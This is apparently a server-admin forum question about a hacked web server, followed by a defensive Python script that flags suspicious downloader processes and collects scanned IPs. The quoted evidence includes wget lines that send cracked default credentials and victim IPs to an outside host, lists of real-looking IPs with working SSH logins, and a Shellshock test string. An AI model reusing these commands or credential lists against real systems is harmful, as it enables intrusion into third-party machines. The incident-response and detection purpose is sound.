(I have asked the same question at https://superuser.com/questions/841908/server-being-hacked-with-lots-of-weird-process and was told it would be better to ask here; could some admin help delete the post at superuser.com? Thanks.)
I was told by our IT that one of our servers has been hacked. There are a lot of processes run by www-data, like:
```
www-data 300 0.0 0.0 30212 1892 ? S 13:54 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.186.101.162
www-data 301 0.0 0.0 30212 1904 ? S 14:11 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.36.202.41
www-data 302 0.0 0.0 30212 1896 ? S 14:02 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.60.63.21
www-data 303 0.0 0.0 30212 1896 ? S 14:07 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.207.51.193
www-data 304 0.0 0.0 30212 1896 ? S 13:54 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.76.78.77
```
In the /tmp folder there are weird files like:
```
-rw-r--r-- 1 www-data www-data 105 Nov 17 21:34 a
-rw-r--r-- 1 www-data www-data 56 Nov 17 21:34 A
drwxr-xr-x 2 www-data www-data 4096 Nov 18 13:16 .m/
-rw-r--r-- 1 www-data www-data 3891200 Nov 17 21:26 m.tar
```
And the contents of the .m folder:
```
dli@ser2:/tmp/.m$ l
nobash.txt pass.txt* print* pscan* rand* ssh2* su* t.log vuln.txt
```
Part of nobash.txt:
```
ubnt ubnt 66.0.5.106 22
ubnt ubnt 66.0.16.109 22
ubnt ubnt 66.0.21.146 22
ubnt ubnt 66.0.153.218 22
ubnt ubnt 66.0.108.178 22
ubnt ubnt 66.0.98.114 22
ubnt ubnt 66.0.75.34 22
ubnt ubnt 66.0.108.138 22
ubnt ubnt 66.0.216.155 22
ubnt ubnt 66.0.197.50 22
ubnt ubnt 66.0.171.194 22
```
Part of vuln.txt:
```
Linux -> ubnt ubnt 66.8.234.101 22
Linux -> ubnt ubnt 66.27.64.22 22
Linux -> ubnt ubnt 66.61.43.61 22
Linux -> ubnt ubnt 66.66.26.165 22
Linux -> ubnt ubnt 66.94.178.113 22
Linux -> ubnt ubnt 66.129.37.62 22
Linux -> ubnt ubnt 66.146.254.112 22
Linux -> ubnt ubnt 66.147.115.66 22
Linux -> ubnt ubnt 66.169.84.19 22
Linux -> ubnt ubnt 66.205.223.146 22
```
Part of t.log:
```
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
ubnt:ubnt:66.0.5.106
ubnt:ubnt:66.0.16.109
```
I used `last` to see if there was any login history but found nothing. I also did `su` to the www-data user, but I could not find anything helpful.
Now I rebooted the server. What I want to ask is how to prevent this kind of thing from happening again? Is there a way to trace back to who is doing this?
Could this be caused by the Shellshock bash vulnerability?
```
dli@srv2:~$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello
```
Many thanks!
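The two symptoms described above (a web-server account spawning `wget` against a bare IP and writing to a hidden file, and scanner output left in /tmp that lists other people's hosts) are things an administrator can hunt for mechanically. The following triage helper is an added example written for this question; it is not code from the original post. It parses `ps aux`-style lines and flags downloaders run by service accounts, and it pulls the set of third-party IP addresses out of the scanner files so their owners or abuse contacts can be notified. The list of service accounts, the two benign sample process lines and the malformed scanner line are constructed assumptions for the demonstration; the flagged lines and file excerpts are those quoted in the question.

```python
"""Triage helpers for a web server whose www-data account is running downloaders
and whose /tmp holds credential-scanner output (see the question above)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Accounts that have no business spawning network downloaders (assumed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}
DOWNLOADERS = {"wget", "curl", "fetch", "tftp"}

# URL whose host is a bare IPv4 address, e.g. http://162.243.121.222/ppp.php
BARE_IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/", re.I)
# A dotfile name such as ".tmp" (but not "." or "..") given as an argument.
HIDDEN_NAME_RE = re.compile(r"\.[A-Za-z0-9_][\w.-]*")
# IPv4 address not embedded in a longer dotted token.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


@dataclass
class Finding:
    pid: int
    user: str
    command: str
    reasons: List[str]


def parse_ps_line(line: str):
    """Split one `ps aux` line into (user, pid, command).

    Columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
    The header line and anything malformed yield None."""
    parts = line.split(None, 10)
    if len(parts) < 11 or not parts[1].isdigit():
        return None
    return parts[0], int(parts[1]), parts[10]


def flag_suspicious_processes(ps_lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per service-account process that looks like a
    download-and-drop: downloader binary, bare-IP URL, or hidden output file."""
    findings: List[Finding] = []
    for line in ps_lines:
        parsed = parse_ps_line(line)
        if parsed is None:
            continue
        user, pid, cmd = parsed
        argv = cmd.split()
        if user not in SERVICE_ACCOUNTS or not argv:
            continue
        binary = argv[0].rsplit("/", 1)[-1]
        reasons = []
        if binary in DOWNLOADERS:
            reasons.append(f"{binary} run by service account {user}")
        m = BARE_IP_URL_RE.search(cmd)
        if m:
            reasons.append(f"fetches from bare IP {m.group(1)}")
        if any(HIDDEN_NAME_RE.fullmatch(a) for a in argv[1:]):
            reasons.append("writes to a hidden file")
        if reasons:
            findings.append(Finding(pid, user, cmd, reasons))
    return findings


def extract_scanned_hosts(file_lines: Iterable[str]) -> Set[str]:
    """Collect the IPv4 addresses listed in scanner output (nobash.txt,
    vuln.txt, t.log formats all carry the address as a plain token)."""
    hosts: Set[str] = set()
    for line in file_lines:
        for candidate in IPV4_RE.findall(line):
            try:
                hosts.add(str(ipaddress.ip_address(candidate)))
            except ValueError:  # e.g. an octet above 255
                continue
    return hosts


# Sample input: the five lines quoted in the question plus two constructed
# benign lines (the header, a normal apache worker, a human user's wget).
SAMPLE_PS = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
www-data 1200 0.0 0.5 250000 12000 ? S 09:00 0:01 /usr/sbin/apache2 -k start
dli 4001 0.0 0.0 30212 1900 pts/0 S+ 10:12 0:00 wget -O report.pdf https://example.com/report.pdf
www-data 300 0.0 0.0 30212 1892 ? S 13:54 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.186.101.162
www-data 301 0.0 0.0 30212 1904 ? S 14:11 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.36.202.41
www-data 302 0.0 0.0 30212 1896 ? S 14:02 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.60.63.21
www-data 303 0.0 0.0 30212 1896 ? S 14:07 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.207.51.193
www-data 304 0.0 0.0 30212 1896 ? S 13:54 0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.76.78.77
""".splitlines()

# Sample scanner output in the three formats seen in /tmp/.m, plus one
# constructed malformed line that must be ignored.
SAMPLE_SCANNER = [
    "ubnt ubnt 66.0.5.106 22",
    "Linux -> ubnt ubnt 66.8.234.101 22",
    "Linux:->",
    "ubnt:ubnt:66.0.5.106",
    "ubnt ubnt 999.1.1.1 22",
]

if __name__ == "__main__":
    for f in flag_suspicious_processes(SAMPLE_PS):
        print(f"PID {f.pid} ({f.user}): {'; '.join(f.reasons)}")
    print("hosts to notify:", sorted(extract_scanned_hosts(SAMPLE_SCANNER)))
```

On a live box the process list would come from `ps aux` output and the scanner files from /tmp/.m; the point of the two functions is that the indicators in the question (service account plus downloader plus bare IP plus dotfile, and a dump of other networks' addresses) are cheap to detect and worth alerting on before the next reboot.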